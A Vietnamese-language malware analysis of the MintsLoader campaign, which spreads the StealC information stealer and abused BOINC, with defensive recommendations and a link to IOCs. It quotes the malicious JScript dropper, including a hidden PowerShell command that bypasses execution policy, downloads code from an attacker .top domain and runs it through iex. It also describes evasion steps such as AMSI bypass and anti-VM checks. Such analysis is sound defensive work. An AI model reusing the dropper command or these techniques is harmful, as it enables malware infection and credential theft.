MintsLoader Phát Tán StealC Malware và BOINC trong Các Cuộc Tấn Công Mạng Có Mục Tiêu
Tổng quan
Trong thời gian gần đây ghi nhận một chiến dịch đang diễn ra, tận dụng một trình tải phần mềm độc hại có tên là MintSloader để phát tán các Payload độc hại như Stealc Information Stealer và Boinc.
Theo như công ty an ninh mạng Esentire cho biết thì chiến dịch lần này chủ yếu nhắm đến các công ty điện, dầu khí và các lĩnh vực dịch vụ pháp lý ở Hoa Kỳ và Châu Âu.
Phát hiện chính
MintsLoader là một bộ tải phần mềm độc hại (malware loader), được sử dụng để phát tán và triển khai các phần mềm độc hại khác trên máy tính của nạn nhân. Theo các báo cáo được ghi nhận thì nó thường được phân phối qua:
Trang web giả mạo hoặc phần mềm lậu
Email phishing
Quảng cáo độc hại (malvertising)
Quá trình lây nhiễm mintsloader bắt đầu khi nạn nhân nhấp vào liên kết trong email spam tải xuống tệp JScript phù hợp với mẫu regex, Fattura [0-9] {8} .js.
StealC là một loại malware đánh cắp thông tin (stealer malware), chuyên thu thập dữ liệu nhạy cảm từ các thiết bị bị nhiễm. Nó chủ yếu nhắm đến trình duyệt web và các ứng dụng phổ biến để đánh cắp:
Thông tin đăng nhập (username, password)
Cookie trình duyệt (để duy trì phiên đăng nhập ngay cả khi mật khẩu bị thay đổi)
Dữ liệu tự động điền (autofill) như số thẻ tín dụng, địa chỉ
Ví tiền điện tử và thông tin tài khoản ngân hàng
Dữ liệu clipboard (có thể chứa mật khẩu hoặc mã xác thực)
BOINC không phải là phần mềm độc hại, nhưng trong một số trường hợp, hacker có thể lạm dụng nền tảng này để khai thác tiền điện tử hoặc thực hiện tính toán trái phép bằng máy tính của người khác.
Nội dung của tệp JScript được ghi nhận
Cách kẻ tấn công thực hiện chiến dịch
Ban đầu kẻ tấn công sẽ lừa nạn nhân để có thể tải xuống một tệp bị nhiễm từ một nguồn không rõ ràng, ví dụ như qua email hoặc một trang web lạ. Trong chiến dịch lần này thì tệp
“Fattura[0-9]{8}.js“đã được tải xuống máy nạn nhân.Kẻ tấn công sẽ sử dụng một đoạn mã Powershell độc hại có liên quan tới Windows Script Host (WSH), có thể được sử dụng để tải xuống và thực thi mã độc từ một địa chỉ web, sau đó xóa chính nó khỏi hệ thống của nạn nhân.
2.1
Wscript.Sleep(13000);:- Lệnh này làm cho script tạm dừng trong 13 giây. Điều này có thể được sử dụng để trì hoãn thực thi phần còn lại của mã, có thể là để tránh bị phát hiện bởi phần mềm bảo mật hoặc để tạo ra khoảng thời gian cần thiết cho quá trình chuẩn bị trước khi thực thi mã độc.
2.2var shell = WScript.CreateObject ("Wscript.Shell");:
- Đoạn mã này tạo ra một đối tượng WScript.Shell, cho phép script thực thi các lệnh hệ thống, như chạy các chương trình hoặc thực thi mã.
2.3 shell.Run("powershell -noprofile —executionpolicy bypass -WindowStyle hidden -c \"curl -useb *http://mubuzb3vwv [.]top/1.php?s=nints13' | iex\"");:
shell.Run(): Lệnh này dùng để chạy một câu lệnh trong môi trường hệ thống. Câu lệnh này yêu cầu PowerShell thực thi một lệnh.powershell -noprofile —executionpolicy bypass: Đây là cách để chạy PowerShell mà không tải profile người dùng và bỏ qua chính sách thực thi (execution policy) để cho phép chạy mã độc.-WindowStyle hidden: Thực thi PowerShell trong chế độ ẩn, không hiển thị cửa sổ PowerShell cho người dùng.curl -usebhttp://mubuzb3vwv.top/1.php?s=nints13| iex:curl: Dùng để tải nội dung từ một URL.URL
http://mubuzb3vwv.top/1.php?s=nints13: Đây là một địa chỉ web mà mã độc sẽ được tải về. Sau khi tải, mã độc được pipe (|) vàoiex(alias củaInvoke-Expressiontrong PowerShell), khiến mã độc trên website này được thực thi trên hệ thống.
2.4 var filesystemobj = WScript.CreateObject("Scripting.FileSystemobject");:
- Đoạn mã này tạo ra một đối tượng FileSystemObject, cho phép script tương tác với hệ thống tệp (file system), ví dụ như tạo, xóa, sao chép tệp.
2.5 filesystemobj.DeleteFile(WScript.ScriptFullName);:
- Lệnh này xóa tệp script hiện tại (tệp mà mã đang chạy).
WScript.ScriptFullNametrả về đường dẫn đầy đủ của tệp script hiện tại, vì vậy khi thực thi đoạn mã này, script sẽ tự xóa chính nó khỏi hệ thống.
Bước tiếp theo một đoạn mã Powershell được khởi chạy nhằm mục đích:
Tải xuống và thực thi phần mềm độc hại từ một máy chủ điều khiển (C2 Server).
Cài đặt StealC Malware hoặc phần mềm khai thác BOINC để đánh cắp thông tin hoặc khai thác tài nguyên hệ thống.
Mở một backdoor trên máy nạn nhân, cho phép hacker truy cập vào hệ thống từ xa.
Tránh bị phát hiện bằng cách làm rối lệnh PowerShell để né tránh các phần mềm bảo mật.
Kẻ tấn công thực hiện các kiểm tra môi trường máy nạn nhân xem có phải là máy ảo không bằng cách chạy một đoạn mã PowerShell và sử dụng kỹ thuật chống phân tích (Anti-VM Detection)
Sau khi đã hoàn tất quá trình kiểm tra trên hệ thống của nạn nhân, kẻ tấn công tiếp tục thực hiện các Powershell để tạo tên miền C2 (Command & Control) một cách ngẫu nhiên. Điều này giúp malware liên lạc với máy chủ điều khiển mà không dễ bị phát hiện hoặc chặn bởi các biện pháp an ninh mạng.
Ban đầu tạo một
$c2là một chuỗi rỗngTạo tên miền ngẫu nhiên từ bảng chữ cái
Ghép thêm
.topvào để tạo tên miền C2
Bước tiếp theo trong chiến dịch lần này, những kẻ tấn công sẽ thực hiện chạy một đoạn mã độc nhằm mục đích:
Tạm dừng thực thi bằng
sleep()để tránh bị phát hiện.Tắt tính năng bảo vệ AMSI của Windows Defender.
Tải xuống tệp thực thi độc hại (
aa.exe) từ máy chủ từ xa (temp.sh).Chạy tệp thực thi (
aa.exe) để lây nhiễm hệ thống.
Sau khi đã hoàn tất thực thi MintsLoader trên máy nạn nhân, kẻ tấn công tiếp tục thực hiện triển khai StealC Malware. Nó sẽ bắt đầu với một đoạn mã C để kiểm tra môi trường máy bị nhiễm trước khi tiếp tục thực thi. Nếu máy tính hoặc người dùng không hợp lệ, chương trình sẽ tự thoát (
ExitProcess(0)) để tránh bị phân tích.
Sau đó StealC Malware tiếp tục kiểm tra để tránh lây nhiễm ở một số quốc gia nhất định: Nga, Ukraine, Belarus, Kazakhstan, Uzbekistan. Khi phát hiện ra máy nạn nhân thuộc các nước trên thì malware sẽ tự động thoát để tránh các rủi ro về mặt pháp lý.
Bên cạnh việc kiểm tra về tên máy, người dùng, quốc gia thì kẻ tấn công tiếp tục thực hiện kiểm tra đến số lượng CPU. Nếu phát hiện máy có dưới 2 CPU, malware sẽ tự thoát (
ExitProcess(0)). Thông thường máy ảo sẽ có 1CPU để tiết kiệm tài nguyên. Sau đó một đoạn mã C cũng được thực thi để kiểm tra dung lượng RAM của máy nạn nhân. Nếu máy có dưới 1111 MB malware sẽ tự thoát
Sau khi hoàn tất các quá trình kiểm tra thì StealC bắt đầu có thể đánh cắp:
Tên đăng nhập và mật khẩu từ trình duyệt
Cookie trình duyệt (có thể dùng để chiếm quyền tài khoản)
Dữ liệu tự động điền (autofill) như thông tin thẻ ngân hàng, địa chỉ
Ví tiền điện tử từ các phần mềm quản lý crypto
Dữ liệu clipboard (có thể chứa mật khẩu hoặc mã xác thực OTP)
\=> Sau khi thu thập dữ liệu, StealC gửi tất cả thông tin đến máy chủ của hacker.
Ngay sau đó BOINC (Berkeley Open Infrastructure for Network Computing) sẽ được triển khai. Hacker lợi dụng BOINC để khai thác tài nguyên máy tính phục vụ các mục đích như:
Khai thác tiền điện tử (crypto mining) bằng cách sử dụng CPU/GPU của nạn nhân mà họ không biết.
Thực hiện tính toán phức tạp cho các dự án giả mạo để trục lợi.
IOC
iocs/MintsLoader/MintsLoader_Stealc_01_14_2025.txt at main · eSentire/iocs · GitHub
Khuyến nghị
Không tải phần mềm từ nguồn không rõ ràng, đặc biệt là crack/game lậu.
Không mở email hoặc liên kết đáng ngờ, ngay cả khi chúng trông giống như từ một tổ chức hợp pháp.
Cập nhật phần mềm và hệ điều hành thường xuyên để tránh bị khai thác lỗ hổng bảo mật.
Kiểm tra tiến trình chạy ngầm trên hệ thống, nếu thấy BOINC hoặc phần mềm lạ mà bạn không cài đặt, hãy kiểm tra ngay.
Dùng phần mềm diệt virus mạnh để phát hiện malware loader như MintsLoader.
Kết luận
Chiến dịch MintSloader được ghi nhận có mục tiêu là các tổ chức ở Hoa Kỳ/Châu Âu, chủ yếu được phân phối qua các email spam có chứa liên kết đến tệp JScript hoặc qua clickfix/kongtuke và khi kết hợp với các kẻ đánh cắp thông tin như Stealc, trở thành một mối đe dọa đến tính bảo mật và tính toàn vẹn của dữ liệu nhạy cảm.
MintsLoader là một công cụ nguy hiểm, có thể được sử dụng để triển khai StealC Malware (đánh cắp dữ liệu) và BOINC (khai thác tài nguyên máy tính) mà không có sự đồng ý của nạn nhân. Nếu nghi ngờ hệ thống bị nhiễm, cần kiểm tra và loại bỏ ngay lập tức để tránh hậu quả nghiêm trọng.
